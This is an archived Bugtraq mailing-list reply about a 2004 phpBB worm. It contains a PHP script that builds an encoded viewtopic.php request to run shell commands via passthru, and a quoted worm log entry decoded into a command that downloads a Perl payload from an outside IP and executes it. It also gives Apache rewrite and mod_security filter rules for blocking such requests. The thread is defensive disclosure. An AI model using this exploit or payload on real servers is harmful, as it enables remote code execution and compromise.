Bugtraq mailing list archives
Re: phpBB Worm
From: "William Geoghegan" <w.geoghegan () geotekcs co uk>
Date: Wed, 22 Dec 2004 23:34:12 -0000
A script to check if your phpBB is vulnerable.Anything below 2.0.11 _probably_ is but incase your not sure, use this script.
The script generates the request parameters, all you need to do is copy the result onto www.thesite.com/viewtopic.php
<? $rush='ls -al'; //do what $highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch print "?t=%37&rush="; for ($i=0; $i<strlen($rush); ++$i) { print '%' . bin2hex(substr($rush,$i,1)); } print "&highlight=%2527."; for ($i=0; $i<strlen($highlight); ++$i) { prt '%' . bin2hex(substr($highlight,$i,1)); } print ".%2527"; ?> Cheers. William Geoghegan GEOTEK Computer Services - www.geotekcs.co.uk ------ Original Message ----- From: "Sebastian Wiesinger" <bofh () fire-world de>
To: <bugtraq () securityfocus com> Sent: Wednesday, December 22, 2004 11:22 AM Subject: Re: phpBB Worm
* Raymond Dijkxhoorn <raymond () prolocation net> [2004-12-22 00:06]:If you cannot fix it (virtual servers) fast for all your clients you couldalso try with something like this: RewriteEngine On RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR] RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)RewriteRule ^.*$ - [F]We had some vhosts where this worked just fine. On our systems we didnt see any valid request with echr and esystem, just be gentle with it, it works for me, it could work for you ;)If you use mod_security, this may help, too:SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("I had another exploit attempt, with this payload:66.119.13.4 - - [22/Dec/2004:10:06:47 +0100] "GET /forum/viewtopic.php?t=%37&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%31%32%38%2E%31%37%34%2E%31%33%37%2E%32%33%30%2F%62%6E%20%2D%4F%20%2E%62%3B%20%70%65%72%6C%20%2D%70%65%20%79%2F%74%68%6D%76%64%77%30%39%38%37%36%35%34%33%32%31%75%6F%69%65%61%2F%61%65%69%6F%75%31%32%33%34%35%36%37%38%39%30%77%64%76%74%68%6D%2F%20%2E%62%7C%20%70%65%72%6C%3B%20%72%6D%20%2D%66%20%2E%62%20%2A%2E%70%6C%20%62%30%74%2A%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 12266 "-" "-"Which decodes to:rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_highlight='.passthru($HTTP_GET_VARS[rush]).' Regards, Sebastian -- GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20) Wehret den Anfaengen: http://odem.org/informationsfreiheit/ Thunder rolled. ... It rolled a six. --Terry Pratchett, Guards! Guards! -- No virus found in this incoming message. Checked by AVG Anti-Virus. Version: 7.0.298 / Virus Database: 265.6.4 - Release Date: 22/12/2004
Current thread:
- phpBB Worm Shannon Lee (Dec 21)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 21)
- Re: phpBB Worm Sebastian Wiesinger (Dec 22)
- Re: phpBB Worm William Geoghegan (Dec 23)
- Re: phpBB Worm Anders Henke (Dec 23)
- Re: phpBB Worm Sebastian Wiesinger (Dec 22)
- RE: phpBB Worm Paul Kurczaba (Dec 21)
- Re: phpBB Worm Alexander Klimov (Dec 22)
- <Possible follow-ups>
- Re: phpBB Worm ycw1bh302 (Dec 22)
- Re: phpBB Worm Alvin Packard (Dec 23)
- Re: phpBB Worm Anders Henke (Dec 23)
- RE: phpBB Worm Ofer Shezaf (Dec 23)
- RE: phpBB Worm Chris Ess (Dec 25)
- Re: phpBB Worm steve (Dec 24)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 24)
(Thread continues...)
- Re: phpBB Worm Raymond Dijkxhoorn (Dec 21)